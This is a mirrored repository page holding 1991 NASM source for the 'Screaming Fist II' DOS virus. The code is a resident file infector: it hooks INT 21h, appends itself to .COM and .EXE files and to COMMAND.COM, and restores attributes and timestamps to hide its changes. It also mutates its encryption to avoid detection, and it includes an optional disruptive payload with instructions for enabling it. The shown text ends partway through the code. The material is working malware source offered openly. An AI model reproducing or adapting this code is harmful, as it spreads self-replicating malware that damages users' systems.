mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
578 lines
20 KiB
NASM
578 lines
20 KiB
NASM
ORG 100H
|
||
|
||
|
||
; The Screaming Fist II virus (c)1991 by Lazarus Long, Inc.
|
||
; The author assumes no responsibility for any damage incurred
|
||
; from the infection caused by this virus
|
||
|
||
CURTAIN_OPEN EQU $
|
||
|
||
ARE_WE_RESIDENT?:
|
||
CLD ;Do not remove this
|
||
CALL DECRYPT_US
|
||
|
||
NEXT_PLACE:
|
||
|
||
MOV AH,30H ;Get DOS version
|
||
INT 21H
|
||
CMP AL,2 ;Lower than 2?
|
||
JBE LEAVE_AND_RESTORE ;Yes,exit
|
||
XOR AX,AX
|
||
DEC AX ;Will return AX=0 if virus is resident
|
||
INT 21H
|
||
OR AX,AX ;Are we resident?
|
||
JZ LEAVE_AND_RESTORE ;If not, install
|
||
|
||
START:
|
||
PUSH DS
|
||
XOR AX,AX ;Now make DS=0
|
||
MOV DS,AX
|
||
DEC WORD PTR [413H] ;Decrease available memory by 1k
|
||
LDS BX,[0084] ;Get INT 21 vector and save it
|
||
CS:
|
||
MOV [BP+OLD_21_BX-NEXT_PLACE],BX
|
||
CS:
|
||
MOV [BP+OLD_21_ES-NEXT_PLACE],DS
|
||
MOV BX,ES ;Get address of our memory block
|
||
DEC BX
|
||
MOV DS,BX
|
||
SUB WORD PTR [0003],80H ;Decrease memory allocated to this program
|
||
MOV AX,[0012] ;Decrease total memory
|
||
SUB AX,80H ;By 80 paragraphs
|
||
MOV [0012],AX ;And save it again
|
||
MOV ES,AX ;Also gives us ES=Top of memory
|
||
PUSH CS ;CS=DS
|
||
POP DS ;
|
||
MOV SI,BP ;
|
||
SUB SI,OFFSET NEXT_PLACE - 100H ;Offset of code to move
|
||
MOV DI,100H ;ES:100h is destination
|
||
MOV CX,LENGTH ;Move entire virus
|
||
REPZ MOVSB ;Move entire virus to top of memory
|
||
MOV DS,CX ;DS=0
|
||
CLI ;Disable interrupts
|
||
MOV [0086],AX
|
||
MOV WORD PTR [0084],OFFSET NEW_21 ;Set INT 21 to our code in high memory
|
||
STI ;Enable interrupts
|
||
MOV AX,3DFFH ;Code to infect command processor
|
||
INT 21H
|
||
POP DS ;DS=ES
|
||
PUSH DS
|
||
POP ES
|
||
|
||
LEAVE_AND_RESTORE:
|
||
;PUSH DS This is just some silly code
|
||
;XOR AX,AX That will cause random problems
|
||
;MOV DS,AX Like floppies not working
|
||
;IN AL,21H Or the system clock stopping
|
||
;XOR AL,[046CH]B If you want to use it
|
||
;AND AL,0FDH Just remove the semi-colons
|
||
;OUT 21H,AL
|
||
;POP DS
|
||
|
||
SUB BP,OFFSET NEXT_PLACE - 100H ;
|
||
OR BP,BP
|
||
JZ LEAVE_EXE ;A zero BP means we're leaving an .EXE
|
||
LEA SI,[BP+ORIGINAL_EIGHT-NEXT_PLACE+4] ;Restore original eight bytes so
|
||
;we can RET to them
|
||
MOV DI,100H
|
||
PUSH DI ;Restore first four bytes
|
||
MOVSW
|
||
MOVSW
|
||
RET ;And return to 100
|
||
|
||
LEAVE_EXE:
|
||
MOV AX,ES ;Use ES for a displacment value
|
||
ADD CS:OLD_CS_DISP - 100H,AX ;Fix up the CS value
|
||
ADD CS:OLD_SS_DISP - 100H,AX ;And the SS value
|
||
|
||
MOV SS,CS:offset OLD_SS_WORD - 100h ;Set the correct SS
|
||
MOV SP,CS:offset OLD_SP_WORD - 100h ;And the correct SP
|
||
JMP $+2 ;Necessary for .EXE's to run right
|
||
;DO NOT REMOVE! IF YOU DO, .EXE's WON'T RUN!
|
||
|
||
DB ,0EAH, ;Makes a far jump to the original .EXE
|
||
;Entry point
|
||
|
||
ORIGINAL_EIGHT EQU $
|
||
|
||
OLD_IP EQU $
|
||
MOV AH,4CH ;.COM file beginning stored here
|
||
|
||
OLD_CS_DISP EQU $
|
||
INT 21H ;
|
||
|
||
OLD_SS_DISP EQU $
|
||
OLD_SS_WORD DW 00 00 ;Save old SS here
|
||
|
||
OLD_SP EQU $
|
||
OLD_SP_WORD DW 00 00 ;And old SP here
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;Here is where the resident part begins in high memory. ;
|
||
;On systems with 640k, this is usually at segment 9F80 ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
|
||
NEW_21:
|
||
PUSHF
|
||
CMP AX,0FFFFH ;AX=FFFF means a program is asking
|
||
JNZ CONTINUE_ASKING ;If the virus is resident
|
||
|
||
POPF ;Return to show that virus is resident
|
||
INC AX ;Return AX=0 to show that we are resident
|
||
IRET
|
||
|
||
CONTINUE_ASKING: ;Infect files on:
|
||
CMP AH,3DH ;Opening
|
||
JZ OPENING
|
||
CMP AH,4BH ;Running
|
||
JZ INFECT_REGULAR
|
||
CMP AH,43H ;Chmod
|
||
JZ INFECT_REGULAR
|
||
CMP AH,56H ;Renaming
|
||
JZ INFECT_REGULAR
|
||
|
||
JMP SHORT OUTTA_HERE
|
||
|
||
OPENING:
|
||
CMP AL,0FFH ;Do we need to infect command processor?
|
||
JNZ INFECT_REGULAR ;Nope, continue
|
||
|
||
PUSH CS ;DS=CS
|
||
POP DS
|
||
MOV DX,OFFSET COMMAND ;If so, let's use C:\COMMAND.COM
|
||
|
||
COM_FILE:
|
||
CALL DISEASE
|
||
POPF
|
||
IRET
|
||
|
||
INFECT_REGULAR:
|
||
|
||
PUSH AX ;Save AX
|
||
CALL CHECK_NAME ;Is DS:DX a .COM or an .EXE file?
|
||
OR AX,AX ;A non-zero AX means nope
|
||
JNZ OUT_WITH_POP
|
||
CALL DISEASE ;Infect file
|
||
|
||
OUT_WITH_POP:
|
||
POP AX ;Restore AX
|
||
OUTTA_HERE:
|
||
POPF ;Continue with old INT 21
|
||
|
||
DB ,0EAH, ;Code for a JMP FAR
|
||
|
||
OLD_21_BX DW 00 00 ;Old Int 21 location is stored here
|
||
OLD_21_ES DW 00 00 ;
|
||
|
||
FUNCTION: ;Used by virus to call old INT 21
|
||
PUSHF
|
||
CALL DWORD PTR CS:[OLD_21_BX]
|
||
RET
|
||
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;This portion handles the actual infection process ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
DISEASE:
|
||
|
||
PUSH AX ;Save all registers
|
||
PUSH BX
|
||
PUSH CX
|
||
PUSH DX
|
||
PUSH SI
|
||
PUSH DI
|
||
PUSH DS
|
||
PUSH ES
|
||
PUSH DX
|
||
|
||
ABOVE_2:
|
||
MOV CS:[OLD_DS]W,DS ;Save DS
|
||
MOV CS:[OLD_ES]W,ES ;Save ES
|
||
PUSH CS ;CS=DS=ES
|
||
PUSH CS
|
||
POP DS
|
||
POP ES
|
||
MOV AX,3524H ;Get INT 24 address
|
||
CALL FUNCTION ;
|
||
MOV OFFSET OLD_24_BX,BX ;Save it
|
||
MOV OFFSET OLD_24_ES,ES ;
|
||
MOV AH,25H ;Now set it to our own code
|
||
LEA DX,OFFSET NEW_24 ;Offset of our INT 24 code
|
||
CALL FUNCTION ;
|
||
|
||
MOV AH,36H ;Get disk free space
|
||
XOR DL,DL ;And quit if less than virus length
|
||
CALL FUNCTION
|
||
JC NEED_TO_LEAVE
|
||
OR DX,DX
|
||
JNZ SET_ATTRIBS
|
||
MUL CX
|
||
MUL BX
|
||
CMP AX,LENGTH
|
||
JNB SET_ATTRIBS
|
||
|
||
NEED_TO_LEAVE:
|
||
POP DX ;Clear stack
|
||
JMP DONE ;And return
|
||
|
||
|
||
SET_ATTRIBS:
|
||
POP DX
|
||
PUSH DX
|
||
MOV DS,OLD_DS
|
||
MOV AX,4300H ;Get the attributes
|
||
CALL FUNCTION
|
||
MOV CS:[OLD_ATTRIBS],CX ;Save them for later
|
||
XOR CX,CX
|
||
MOV AX,4301H
|
||
CALL FUNCTION ;Set attribs to normal
|
||
JC LEAVE_WITH_ATTRIBS ;Leave if error
|
||
|
||
OPEN_IT:
|
||
MOV AX,3D02H ;Open file with Read and Write access
|
||
CALL FUNCTION
|
||
JC NEED_TO_LEAVE ;Quit on error
|
||
PUSH CS ;CS=DS
|
||
POP DS
|
||
XCHG BX,AX ;Save handle
|
||
MOV AH,3FH ;Read BUF_LENGTH bytes into CS:BUFFER
|
||
LEA DX,BUFFER ;Offset of buffer
|
||
MOV CX,BUF_LENGTH ;Read 'Em
|
||
CALL FUNCTION
|
||
JC LEAVE_AND_CLOSE ;Quit on error
|
||
CMP OFFSET BUFFER,5A4DH ;Is this an .EXE file?
|
||
JZ NAIL_EXE ;If so, we gotta do some things
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;This portion handles a .COM infection ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
MOV AL,[BUFFER+3]B ;An indentical byte means this .COM is
|
||
INC AL
|
||
CMP AL,[BUFFER+1]B ;probably already infected
|
||
JNZ CONTINUE_TO_INFECT ;If it isn't, let's get it!
|
||
|
||
LEAVE_AND_CLOSE:
|
||
MOV AH,3EH ;Close this file
|
||
CALL FUNCTION
|
||
|
||
LEAVE_WITH_ATTRIBS:
|
||
POP DX
|
||
PUSH DX
|
||
CALL RESTORE_ATTRIBS ;Restore the attributes if needed
|
||
JMP SHORT NEED_TO_LEAVE
|
||
|
||
CONTINUE_TO_INFECT:
|
||
|
||
MOV SI,OFFSET BUFFER ;Starting at CS:BUFFER
|
||
PUSH CS ;CS=ES
|
||
POP ES
|
||
LEA DI,OFFSET ORIGINAL_EIGHT;Where to save original eight bytes to
|
||
MOVSW ;Save infected files original eight bytes
|
||
MOVSW
|
||
|
||
MOV AX,4202H ;Send RW pointer to end of file
|
||
XOR CX,CX
|
||
XOR DX,DX
|
||
CALL FUNCTION
|
||
OR DX,DX ;A non-zero DX means too big of a file
|
||
JNZ LEAVE_AND_CLOSE
|
||
CMP AX,300 ;Don't infect files less than 300 bytes
|
||
JB LEAVE_AND_CLOSE
|
||
CMP AX,64000 ;Or bigger than 64000
|
||
JA LEAVE_AND_CLOSE
|
||
SUB AX,3 ;Use the pointer as our jump code
|
||
MOV [BUFFER]B,0E9H ;Code for absolute JMP
|
||
MOV [BUFFER+1],AX ;This sets up the .COM so we can tell
|
||
DEC AL ;If it's infected next time we see it
|
||
MOV [BUFFER+3],AL
|
||
JMP SHORT ATTACH ;Continue past .EXE infector
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;This portion handles infecting all .EXE files ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
NAIL_EXE:
|
||
|
||
CMP WORD PTR [BUFFER+14H],1 ;Offset of IP reg. Is this .EXE infected?
|
||
JZ LEAVE_AND_CLOSE ;Leave if already infected
|
||
|
||
GET_EXE:
|
||
MOV AX,[BUFFER+4] ;EXE size in 512 byte pages
|
||
MOV CX,0200H ;Multiply by 512 to get filesize
|
||
MUL CX ;
|
||
PUSH AX ;Save AX, AX=Filesize low byte
|
||
PUSH DX ;Save DX, DX=Filesize high byte
|
||
MOV CL,04 ;
|
||
ROR DX,CL ;
|
||
SHR AX,CL ;
|
||
ADD AX,DX ;
|
||
SUB AX,[BUFFER+8] ;Size of header in 16 byte paragraphs
|
||
PUSH AX ;AX is new code segment displacement
|
||
MOV AX,[BUFFER+14H] ;Get old IP register
|
||
MOV [OLD_IP],AX ;Save it here
|
||
MOV AX,[BUFFER+16H] ;Get old code segment displacement
|
||
ADD AX,10H ;Add 10 to it
|
||
MOV [OLD_CS_DISP],AX ;Save it here
|
||
MOV AX,[BUFFER+14] ;Get old stack segment
|
||
ADD AX,10H ;Adjust it for later
|
||
MOV [OLD_SS_DISP],AX ;And save it here
|
||
MOV AX,[BUFFER+16] ;Get stack pointer
|
||
MOV [OLD_SP],AX ;And save it here
|
||
POP AX ;Restore AX
|
||
MOV [BUFFER+16H],AX ;New code segment
|
||
MOV [BUFFER+14],AX ;New SS=CS
|
||
MOV [BUFFER+16],0FFFFH ;SP = End of viral code
|
||
MOV WORD PTR [BUFFER+14H],1 ;New IP register
|
||
ADD WORD PTR [BUFFER+4],2 ;Size of file in 512 byte pages
|
||
POP CX
|
||
POP DX
|
||
MOV AX,4200H ;Move file pointer
|
||
CALL FUNCTION
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
; Attach our viral code to the target file ;
|
||
; This portion is shared by the .EXE and the .COM infectors to be more ;
|
||
; efficient ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
|
||
ATTACH:
|
||
|
||
MOV AX,5700H ;Get the file time and date
|
||
CALL FUNCTION
|
||
PUSH CX ;And save them for later
|
||
PUSH DX
|
||
|
||
INFECT:
|
||
|
||
XOR AX,AX
|
||
MOV DS,AX
|
||
MOV AX,[046CH] ;Get a random encryption key from timer
|
||
MOV DL,AH ;Save part of it in DL
|
||
PUSH CS ;DS=CS
|
||
POP DS ;
|
||
MOV ENC_BYTE,AL ;Save keys in our code
|
||
MOV ENC_BYTE_2,DL
|
||
PUSH CS ;CS=ES
|
||
POP ES
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
|
||
;This section provides a semi-random encryption code mutation based on our <20>
|
||
;encryption keys. Look at each line for a desc. of what it does to the code. <20>
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
|
||
TEST AL,1
|
||
JZ SKIP_1
|
||
XOR WORD PTR ENC_SWITCH,0ABDEH ;MOV SI,BP <=> PUSH BP POP SI
|
||
SKIP_1:
|
||
TEST DL,1
|
||
JZ SKIP_2
|
||
XOR BYTE PTR [ENC_SWITCH_2 + 1],012H ;OR DL,AL <=> XOR AL,DL
|
||
SKIP_2:
|
||
TEST AL,2
|
||
JZ SKIP_4
|
||
XOR BYTE PTR [ENC_SWITCH_4 + 2],010H
|
||
SKIP_4:
|
||
TEST DL,2
|
||
JZ SKIP_5
|
||
XOR BYTE PTR [ENC_SWITCH_5 + 2],010H
|
||
SKIP_5:
|
||
TEST AL,3
|
||
JZ SKIP_6
|
||
XOR BYTE PTR [ENC_SWITCH_1 + 1],08H
|
||
SKIP_6:
|
||
TEST DL,3
|
||
JZ SKIP_7
|
||
XOR BYTE PTR [ENC_SWITCH_3 + 1],08H
|
||
SKIP_7:
|
||
TEST AL,4
|
||
JZ SKIP_8
|
||
XOR BYTE PTR [ENC_SWITCH_6 + 1],08H
|
||
SKIP_8:
|
||
MOV SI,CURTAIN_OPEN
|
||
MOV DI,DATA_END
|
||
PUSH DI
|
||
PUSH DI
|
||
MOV CX,LENGTH
|
||
REPZ MOVSB
|
||
POP SI
|
||
ADD SI,4
|
||
CALL ENCRYPT_US
|
||
POP DX
|
||
MOV AH,40H ;Code for handle write
|
||
MOV CX,LENGTH ;Length of our viral code
|
||
CALL FUNCTION ;Write all of virus
|
||
|
||
MAKE_HEADER:
|
||
MOV AX,4200H ;Set file pointer to beginning
|
||
XOR CX,CX ;Zero out CX
|
||
XOR DX,DX ;Zero out DX
|
||
CALL FUNCTION
|
||
MOV AH,40H ;Write to file
|
||
MOV DX,OFFSET BUFFER ;Starting at BUFFER
|
||
MOV CX,BUF_LENGTH ;Write BUF_LENGTH bytes
|
||
CALL FUNCTION
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
; This restores the files original date and time ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
|
||
RESTORE_TIME:
|
||
MOV AX,5701H ;Restore original date and time
|
||
